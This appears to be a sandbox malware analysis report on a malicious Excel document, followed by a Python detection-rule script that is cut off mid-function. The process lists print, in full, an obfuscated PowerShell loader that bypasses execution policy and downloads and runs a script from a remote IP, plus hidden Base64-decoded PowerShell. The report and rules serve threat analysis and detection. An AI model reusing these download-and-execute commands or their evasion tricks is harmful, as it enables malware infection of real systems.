Analysis Overview
SHA256
a817dfdce631969b109d59bb4f23ead01218c275f94dc04a11151cd9027f2333
Threat Level: Known bad
The file f8136a20dbec93a03aaebaf7d36ff199.bin was found to be: Known bad.
Malicious Activity Summary
Process spawned unexpected child process
Evasion via Device Credential Deployment
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Drops file in System32 directory
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Suspicious behavior: AddClipboardFormatListener
Suspicious use of SetWindowsHookEx
Modifies Internet Explorer settings
Uses Volume Shadow Copy WMI provider
Uses Volume Shadow Copy service COM API
Enumerates system info in registry
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Checks processor information in registry
Uses Task Scheduler COM API
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-14 01:58
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-14 01:58
Reported
2024-11-14 02:01
Platform
win7-20240903-en
Max time kernel
139s
Max time network
147s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Evasion via Device Credential Deployment
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE | N/A |
| File opened for modification | C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\544e3a275c258b90d8cda8be36b057e75451b4901d4663082db9f97419cd5a4a.xls
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe -Embedding
C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE
"C:\Windows\SysTeM32\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE" "powersheLL.Exe -eX byPaSS -nOP -W 1 -c DEVicecreDENTIAldEpLOyMent.EXe ; IEx($(IEX('[SySTem.tEXT.eNcodINg]'+[cHAR]58+[cHar]58+'UTf8.gEtSTrinG([SYSTEm.CONvErt]'+[ChAR]0X3A+[cHar]58+'FrOmbaSe64sTrINg('+[chaR]0X22+'JGQzV3JwICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10WXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbUJFckRlRmluaXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJsbU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJrdExTUVhZLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEVYb1FHLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJIbGxGLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsb3hDeHF1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdXUik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkJaZ1NrT0N3ZnQiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGpXYW1SYUx2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRkM1dycDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTY3L3hhbXBwL25jL3NlZXRoZWJlc3RvcHRpb25zdG91bmRlcnN0YW5kZmFzdHRoaW5nc3RvYmVnZXRiYWNrYmlzY3V0LnRJRiIsIiRlTnY6QVBQREFUQVxzZWV0aGViZXN0b3B0aW9uc3RvdW5kZXJzdGFuZGZhc3R0aGluZ3N0b2JlZ2V0LnZiUyIsMCwwKTtTdEFSdC1TbEVlUCgzKTtzdGFyVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFcc2VldGhlYmVzdG9wdGlvbnN0b3VuZGVyc3RhbmRmYXN0dGhpbmdzdG9iZWdldC52YlMi'+[ChAr]34+'))')))"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX byPaSS -nOP -W 1 -c DEVicecreDENTIAldEpLOyMent.EXe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lbcmpz1h.cmdline"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBC3E.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCBC3D.tmp"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestoptionstounderstandfastthingstobeget.vbS"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 4t.gg | udp |
| KR | 221.146.204.133:443 | 4t.gg | tcp |
| US | 8.8.8.8:53 | r10.o.lencr.org | udp |
| GB | 88.221.134.89:80 | r10.o.lencr.org | tcp |
| US | 198.46.178.167:80 | 198.46.178.167 | tcp |
| KR | 221.146.204.133:443 | 4t.gg | tcp |
| US | 198.46.178.167:80 | 198.46.178.167 | tcp |
| US | 198.46.178.167:80 | 198.46.178.167 | tcp |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| GB | 2.19.252.157:80 | crl.microsoft.com | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| GB | 95.100.245.144:80 | www.microsoft.com | tcp |
Files
memory/1848-0-0x000000005FFF0000-0x0000000060000000-memory.dmp
memory/1848-1-0x0000000071EDD000-0x0000000071EE8000-memory.dmp
memory/1984-16-0x0000000002820000-0x0000000002822000-memory.dmp
memory/1848-17-0x0000000002DD0000-0x0000000002DD2000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751
| MD5 | 822467b728b7a66b081c91795373789a |
| SHA1 | d8f2f02e1eef62485a9feffd59ce837511749865 |
| SHA256 | af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9 |
| SHA512 | bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
| MD5 | 9bd2efe99229919b8d6dc43d5e0f86fb |
| SHA1 | f268f6e47bd589efc2797d88210ae4f659006118 |
| SHA256 | 935aba64f09e60a6d07a9dabc1d8a65e6882a55ad57f84d5d9debdc3e8404636 |
| SHA512 | 5149ea3429674631d8a62756ce106b6602350f0fb77d0e3816786a2a465f65a545557264bc573b4a0b8de79b3f4a8fcba6870806754feb71c609ebfe0fdc9eb8 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CB467543952BE6B5200B9CADEB942CD1
| MD5 | 085de3695f14fff3f936f7ee9802ef13 |
| SHA1 | 90a0b513bbf8d9173bcdaf402254c0701397b212 |
| SHA256 | ef90d8b12068a18a3579d0b963e581ede7bf9adde07b4454427a73e5f7bc0345 |
| SHA512 | 714ceae2cc122eaf829023ee52ea9de770111ff7908bba9864ce63309ef6fe52f1ba759d0e10c4858c9be03510f9d264575d8e4acf49d7f5488b43a5829af5b5 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CB467543952BE6B5200B9CADEB942CD1
| MD5 | 242d5065f90e2bc0c080bb9f6364c24c |
| SHA1 | af40d248dbb2044abc0669d20e384838c48569a7 |
| SHA256 | 6c5a2f0f49738a8fa4ce15c3fb8363d43d76a3cdc2dd6becc236af6e8a66d9ef |
| SHA512 | acbabbf7f07be8f3a8e69f87ac56ca41719445666e153062b2d1aac68aace6bb12e58fc79822c9991eec227e3459556d8a31015ab2b56b155ae710d411520cd5 |
C:\Users\Admin\AppData\Local\Temp\CabB04C.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Q0WBLVJY\seemybestpartaroundtheworldtogetmethingsfornewone[1].hta
| MD5 | fa26f1bca49d7fac5a0150c69f718b19 |
| SHA1 | d143c88ad2906d1a81c1f06c2d931d04970e0f9e |
| SHA256 | fdfedc9927a45e7728387b3cc323023950295cb66c7273820bcf0d7d9e97d53c |
| SHA512 | 10b0b1c95b26d931857cce2011c6c8d7e40337a899419bdd3e8fd1f90ea8e6837c0dd5ff9f0a2ef5752c3bb2b618290772addf459d54bdf0fb8d036ec52614ec |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | ec542e4d46b26daaf2115589d2d48953 |
| SHA1 | 894e579f6207e46b4e64690fba74c6bd068f5880 |
| SHA256 | f28c440db73e7190080197ce3ad513b4bc23c288358933c62abfee6b301a376e |
| SHA512 | 92299fb1f9c347a36039b6051e1099bddb412941bb6c24d622a32669ff675edd6f4c5d70707e2da6e49015f3501f87c5ab5f5d630cf11d417c8ad354bfded9c1 |
\??\c:\Users\Admin\AppData\Local\Temp\lbcmpz1h.cmdline
| MD5 | cb8e108e6b28166b19c6382308438455 |
| SHA1 | e0846644053dd9ff3721b442e930e00ad22b226d |
| SHA256 | a6f4a5f5c97b55bd38b811aa7fc67e6f06681d55701364ca2684b44ffc1ef933 |
| SHA512 | 5eeb82855d6d11c7d5bfaabf3791948f2445d600cfbdaf68f086a591c6792a1d3cca554f17c6bbbdf67d4ec0cbb8eb42f65a308c57fdcb7f4690145d3dd7bacf |
\??\c:\Users\Admin\AppData\Local\Temp\lbcmpz1h.0.cs
| MD5 | 0b9734ed54c4f41d0c94957b007eb3d5 |
| SHA1 | ebabbb2d826295a994ba691d921a4c7c5ed506d1 |
| SHA256 | 36632527d6cce240e5833d6251632127fd95f085c35a3aa2a363be2f2cbc84fa |
| SHA512 | d32ebc74674dd75c354a9b74324421a2a4af0a2d6feeb3735d3fab857fb488aaf8be88f4687299c614b6e70556b3980ba007ba02abb8e5e341a2cabccdd10b17 |
\??\c:\Users\Admin\AppData\Local\Temp\CSCBC3D.tmp
| MD5 | ae71002d54da4a838ee54e1d9a03431f |
| SHA1 | 08e033f18ec2af9fa51771fcd90becdd00c17701 |
| SHA256 | 7742f85622894968c3d762da011c5ca288404bda0017890b34511fc11f40d981 |
| SHA512 | 79dbbaec86c425541611b1eb5c24c898308739e17ba8582e2661f473f84ba30ba716efaaafe1dcfbafd108c37af03d462905810a8f5259e3326fac6ff8fefeda |
C:\Users\Admin\AppData\Local\Temp\RESBC3E.tmp
| MD5 | 72295721b8862079ce057e8bc89e00d8 |
| SHA1 | 936668d2c6eafe8e3f5c677fb6c8956040e24a6c |
| SHA256 | 7295ec96a820d728b830db39c95ed62ef6539a3ff218551a377f62a6e16094e3 |
| SHA512 | 8a3a883a88654538ee5cdfd8f665a68fbe8e231a2387379876235f2e3098653f4dcb81b41d1807ab3b25fddb3d98ee66be642fe9bd3d91b29290e8a234dffb0a |
C:\Users\Admin\AppData\Local\Temp\lbcmpz1h.dll
| MD5 | 757fc17bb70368acf40a1e6850a33a43 |
| SHA1 | 3beb41c89425a1df4970c80443f6844669ca703b |
| SHA256 | 28edaa1e1730e70169b2084a5f60d80dee10f76c49495f3786a05488cd826448 |
| SHA512 | 6b18bf4219ebe2d2b5d4eb2f0ef7ed8d8dc8b7c77ac4273f3ba4b6c9d1f42b2873bba3f9a36bd4c0e936cc88e68feacf8a09f202b22fcb5f83db5e37463f5a62 |
C:\Users\Admin\AppData\Local\Temp\lbcmpz1h.pdb
| MD5 | ee3aef4422bbc6f8ec2e989a5391e04e |
| SHA1 | 1aa909c3e43662a58446732b88cd3b558e6adcb3 |
| SHA256 | 911055a81aa75b82921029368326e6798cd605720e29ba587e75ce48b9939def |
| SHA512 | 1b9a10fcb3145661f4d1fd407fd8eaa15e2ef65828437f927dcefb088f53e4f931c3e3816a24c22452fdeb00ea62353bd76b68ff1aca5c0747d0b0ff7d89fce4 |
memory/1848-60-0x0000000071EDD000-0x0000000071EE8000-memory.dmp
C:\Users\Admin\AppData\Roaming\seethebestoptionstounderstandfastthingstobeget.vbS
| MD5 | 4f46597a54e903c400cac4db5a222ecb |
| SHA1 | 0a2f30da05a532bfbddaba3af235011d60db8fc8 |
| SHA256 | ba78e6d4f42b1aab53a731c9bd0820d2f0278170eb5ef92604f32e92cfcb8246 |
| SHA512 | ffac65a2a99fe7c3883bb82f5736dbcbcdd8e3d8cecd265fda76e7b7d07d266f1f0b11eaa3adcf714a7e50314d3e140e50799e5b52fe2494da05f504912f344a |
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-14 01:58
Reported
2024-11-14 02:01
Platform
win10v2004-20241007-en
Max time kernel
145s
Max time network
158s
Command Line
Signatures
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | N/A | C:\Windows\System32\mshta.exe | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4808 wrote to memory of 4192 | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | C:\Windows\System32\mshta.exe |
| PID 4808 wrote to memory of 4192 | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | C:\Windows\System32\mshta.exe |
Uses Task Scheduler COM API
Uses Volume Shadow Copy WMI provider
Uses Volume Shadow Copy service COM API
Processes
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\544e3a275c258b90d8cda8be36b057e75451b4901d4663082db9f97419cd5a4a.xls"
C:\Windows\System32\mshta.exe
C:\Windows\System32\mshta.exe -Embedding
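The two process lists together give the detection surface for this sample: an Office application starting mshta.exe (the "Process spawned unexpected child process" signature above), PowerShell launched with abbreviated and case-mangled switches, a case-mangled image path, inline Base64 decode in a command line, PowerShell invoking the C# compiler (Add-Type), and a script host running a file out of %APPDATA%. The rules below are an added example, not part of the report or the sandbox. The events are constructed from the two process lists (images and command lines as recorded, long payloads shortened): PIDs 1848 and 1984 follow the behavioral1 memory-dump names, the other PIDs are made up, and the parent links for behavioral1 are assumed from the listed order and from the .hta and .vbS artifacts (the report states the EXCEL.EXE to mshta.exe link only for behavioral2). Switch resolution follows powershell.exe's rule that any unambiguous prefix of a parameter name is accepted, so `-eX`, `-nOP` and `-W 1` resolve the same way as `-executionpolicy`, `-NoProfile` and `-windowstyle hidden`.

```python
"""Detection rules for the process trees recorded in behavioral1 and behavioral2.

Added example, not part of the sandbox report. EVENTS is constructed from the
report's process lists; PIDs 1848/1984 follow the behavioral1 memory-dump names,
the other PIDs and the behavioral1 parent links are assumed.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # image path as the sensor recorded it, casing preserved
    cmdline: str


OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe", "cmd.exe"}
DOTNET_COMPILERS = {"csc.exe", "vbc.exe"}
# Canonical casing for binaries whose paths get case-mangled to dodge naive string matches.
CANONICAL = {
    r"c:\windows\system32\windowspowershell\v1.0\powershell.exe": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    r"c:\windows\syswow64\windowspowershell\v1.0\powershell.exe": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
}

EVENTS = [  # constructed from the report's process lists; see module docstring
    ProcEvent(1848, 1000, r"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE",
              r'"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\544e3a275c258b90d8cda8be36b057e75451b4901d4663082db9f97419cd5a4a.xls'),
    ProcEvent(1984, 1848, r"C:\Windows\SysWOW64\mshta.exe", r"C:\Windows\SysWOW64\mshta.exe -Embedding"),
    ProcEvent(2208, 1984, r"C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE",
              r'"C:\Windows\SysTeM32\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE" "powersheLL.Exe -eX byPaSS -nOP -W 1 -c DEVicecreDENTIAldEpLOyMent.EXe ; '
              r'IEx($(IEX(''[SYSTEm.CONvErt]''+[ChAR]0X3A+[cHar]58+''FrOmbaSe64sTrINg(''+[chaR]0X22+''JGQzV3Jw...YlMi''+[ChAr]34+''))'')))"'),  # Base64 shortened
    ProcEvent(2256, 2208, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
              r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX byPaSS -nOP -W 1 -c DEVicecreDENTIAldEpLOyMent.EXe'),
    ProcEvent(2300, 2208, r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe",
              r'"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lbcmpz1h.cmdline"'),
    ProcEvent(2324, 2300, r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe",
              r'C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBC3E.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCBC3D.tmp"'),
    ProcEvent(2400, 2208, r"C:\Windows\SysWOW64\WScript.exe",
              r'"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestoptionstounderstandfastthingstobeget.vbS"'),
    ProcEvent(2448, 2400, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
              r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = ''<payload-omitted>'';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));'
              r'powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD'),
    ProcEvent(2496, 2448, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
              r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command'),
]


def image_name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def tokens(cmdline: str) -> list:
    # Quotes are dropped on purpose: mshta and PowerShell relaunches nest the real
    # switches inside one quoted argument, as PID 2208 above shows.
    return cmdline.replace('"', " ").split()


def is_switch(tok: str, full: str, minlen: int) -> bool:
    """powershell.exe accepts any unambiguous prefix of a parameter name (-ex, -nop, -w)."""
    if tok[:1] not in ("-", "/"):
        return False
    name = tok[1:].lower()
    return len(name) >= minlen and full.startswith(name)


def powershell_flags(cmdline: str) -> dict:
    """Resolve abbreviated, case-mangled switches into the settings they select."""
    toks = tokens(cmdline)
    flags = {"bypass": False, "hidden": False, "noprofile": False}
    for i, tok in enumerate(toks):
        nxt = toks[i + 1].lower() if i + 1 < len(toks) else ""
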